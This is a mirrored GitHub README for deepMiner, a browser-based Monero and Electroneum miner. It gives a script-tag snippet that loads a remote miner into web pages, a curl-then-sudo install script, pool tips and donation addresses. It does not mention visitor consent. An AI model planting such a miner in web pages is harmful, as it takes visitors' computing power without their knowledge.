tsgoff / deepMiner

deepMiner miner proxy

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

deepMiner

  • deepMiner (idea from coinhive.js) By evil7@deePwn
  • Working on XMR(Monero) and ETN(Electroneum) personal wallet
  • Eazy way mining in browsers & Nice payback than Ad-inject

Support on

Donate (if you like this project <3)

Glad to have your support. More awesomes coming soon!

Coin Address
BTC 1HNkaBbCWcye6uZiUZFzk5aNYdAKWa5Pj9
XMR 41ynfGBUDbGJYYzz2jgSPG5mHrHJL4iMXEKh9EX6RfEiM9JuqHP66vuS2tRjYehJ3eRSt7FfoTdeVBfbvZ7Tesu1LKxioRU
ETN etnkF3ewgWDaFwLr39okYsW4yaC5cb5bEMZUJsCJsgeJM6Lx3oeAs8VhSYcQBwQTbxNA5TcRiPtAk1GqeFZtAVzK5DJ7d9mmXh

Usage

  • Add some javascript and write like this :
<script src="https://digxmr.com/deepMiner.js"></script>
<script>
    var miner = new deepMiner.Anonymous('deepMiner_test').start();
</script>
  • All done! XD~ Let's build our srv by self

Install

curl https://raw.githubusercontent.com/deepwn/deepMiner/master/install.sh > install.sh
sudo sh install.sh

lib request: *nodejs / *npm / ?nginx

useful pakages: forever

ssl support: https://certbot.eff.org/

OS pass: ubuntu(debian)

API

Same like this: https://coinhive.com/documentation/miner (JUST javascript API)

Update

Just go /srv/deepMiner and run git pull

DON'T forget backup your config.json !!!

Attention

Some VPS's default DNS can't find IP for the pool. Check your DNS setting if it's wrong.

SSL cert request default TRUE. Use certbot to quickly set it.

If not a bug just Qus in something setting or in install. Please write down at deepwn#8

Example & Some tips

https://digxmr.com/demo.html

Tips:

  1. Trying build own pool-Server too? https://github.com/zone117x/node-cryptonote-pool / https://github.com/Snipa22/nodejs-pool
  2. If you want to create your own pool. check my blog it's maybe helpful to you. (just in chinese language now)

blog1 http://www.freebuf.com/column/151316.html blog2 http://www.freebuf.com/column/151376.html

About pools

  1. Choice another pool which you wanna using: https://github.com/timekelp/xmr-pool-choice

  2. If ETN pool you want: http://minekitten.io a nice pool and so qute funny UI. (Or build one pool by yourself. Same way like build a xmr pool)

Rules if building a pool by yourself:

  1. NO banned in the pool. This deepMiner object working in a web page. used to payback XMR for your website like the Ad payback. But you know people will NOT stay on just 1 site page and will not take long time stay in website (If NOT online web game or online live show). So do not banned in your pool and used the pool just yourself.

  2. stay in Low-difficulty, It's more eazy for this JavaScript miner. Stucked at diff=256 or diff=1000 is OK.

License

MIT https://raw.githubusercontent.com/deepwn/deepMiner/master/LICENSE

Missions

Building a WebUI. Manage about miner status and banned rules pool setting or something

About

deepMiner miner proxy

License:Other


Languages

Language:JavaScript 57.5%Language:HTML 42.3%Language:Shell 0.2%